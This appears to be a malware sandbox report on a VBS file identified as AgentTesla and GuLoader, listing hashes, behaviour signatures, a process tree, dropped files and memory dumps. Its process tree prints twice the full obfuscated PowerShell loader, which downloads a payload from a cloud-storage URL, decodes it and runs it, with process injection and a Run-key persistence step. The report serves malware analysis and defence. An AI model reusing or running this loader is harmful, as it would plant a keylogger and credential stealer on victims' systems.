Overview

overview

10

Static

static

1

G4-TODOS.vbs

windows7-x64

10

G4-TODOS.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24-04-2024 04:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    G4-TODOS.vbs

  • Size

    8KB

  • MD5

    0894754b81c21bfa79481c3940d134d5

  • SHA1

    381352cd7b6551606bfb8c07cd77d7c50ffe41cc

  • SHA256

    0d456eedf9663741ffc712deadd8f8960e711b68de8b198ec1aec9dc4e3279d4

  • SHA512

    ea8fb60de2b0c6f67c2473963348a505fc031e8e361eae051d3a8efdd1a63984c5fe06c4b832a906c76a590c2346bdf19de39a5d5965d1961bee20e421c2f06b

  • SSDEEP

    192:jVNOLlEuLpGIxZX2ufM8Nft3fIlikQNJtuMsVU3UbyWzR6zaSLE2mM8ggQTGOKPd:pNOLlEbIxZX2uf9NVQlikQPtsekbyWzx

Score
10/10
agentteslaguloaderdownloaderkeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\G4-TODOS.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1984
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
        3⤵
          PID:3064
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            4⤵
              PID:2464
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2472

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Coleoptilum.Unw
        Filesize

        425KB

        MD5

        ced110ae799f108ba8dd3020a033596b

        SHA1

        43d40c2ee9c3da906e6a1fcd44992ed06685c637

        SHA256

        e374e8259a203f3c0610d2f18f59b9338f52a6514f635cda5ccf7ca88243c08f

        SHA512

        225a95ebb985bbc313734097f0eaed503352ccbdb9f33894297e4fa8d76d159bed7fe4761df87a004a178daa12f9fc8be16af03f7d9fdcfbbf84fc18d9135f24

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TA97S32OU6G8XE5VFZ5A.temp
        Filesize

        7KB

        MD5

        5a78573b522cc63a83d6c8ceb90476e6

        SHA1

        f50b02578be448a0bbbb7d5cea6a6aa392d11209

        SHA256

        df8542deb538fdf09195b2cc318490f6a951f9ae2cb210971ae08dc643f279bf

        SHA512

        1d5bff3ec3ccb2cead4cf2564f567f5cda37465891e35097a2c0291181ca902cfd9e22d31fdc4982a00b5202200847d1c4c7ab4848ec3d46b616ea2ac794e08c

        Download Submit
      • memory/1984-10-0x0000000002680000-0x0000000002700000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1984-7-0x0000000002680000-0x0000000002700000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1984-8-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1984-9-0x0000000002680000-0x0000000002700000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1984-22-0x0000000002680000-0x0000000002700000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1984-11-0x0000000002680000-0x0000000002700000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1984-6-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1984-71-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1984-4-0x000000001B110000-0x000000001B3F2000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/1984-24-0x0000000002680000-0x0000000002700000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1984-19-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1984-23-0x0000000002680000-0x0000000002700000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1984-5-0x0000000001E60000-0x0000000001E68000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2412-30-0x00000000051F0000-0x00000000051F1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2412-29-0x0000000006320000-0x0000000008FE3000-memory.dmp
        Filesize

        44.8MB

        Download
      • memory/2412-18-0x00000000022B0000-0x00000000022F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2412-25-0x00000000022B0000-0x00000000022F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2412-26-0x0000000005E70000-0x0000000005F70000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/2412-27-0x0000000073990000-0x0000000073F3B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2412-28-0x0000000073990000-0x0000000073F3B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2412-17-0x00000000022B0000-0x00000000022F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2412-31-0x00000000022B0000-0x00000000022F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2412-67-0x0000000073990000-0x0000000073F3B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2412-32-0x0000000006320000-0x0000000008FE3000-memory.dmp
        Filesize

        44.8MB

        Download
      • memory/2412-35-0x0000000005E70000-0x0000000005F70000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/2412-36-0x0000000077950000-0x0000000077AF9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2412-37-0x0000000006320000-0x0000000008FE3000-memory.dmp
        Filesize

        44.8MB

        Download
      • memory/2412-38-0x0000000077B40000-0x0000000077C16000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2412-20-0x00000000022B0000-0x00000000022F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2412-16-0x0000000073990000-0x0000000073F3B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2412-70-0x0000000006320000-0x0000000008FE3000-memory.dmp
        Filesize

        44.8MB

        Download
      • memory/2472-39-0x00000000020B0000-0x0000000004D73000-memory.dmp
        Filesize

        44.8MB

        Download
      • memory/2472-43-0x0000000077B40000-0x0000000077C16000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2472-65-0x0000000001040000-0x00000000020A2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/2472-42-0x0000000077B76000-0x0000000077B77000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2472-68-0x0000000001040000-0x0000000001082000-memory.dmp
        Filesize

        264KB

        Download
      • memory/2472-69-0x000000006F410000-0x000000006FAFE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/2472-41-0x00000000020B0000-0x0000000004D73000-memory.dmp
        Filesize

        44.8MB

        Download
      • memory/2472-40-0x0000000077950000-0x0000000077AF9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2472-72-0x0000000022870000-0x00000000228B0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2472-76-0x000000006F410000-0x000000006FAFE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/2472-77-0x0000000022870000-0x00000000228B0000-memory.dmp
        Filesize

        256KB

        Download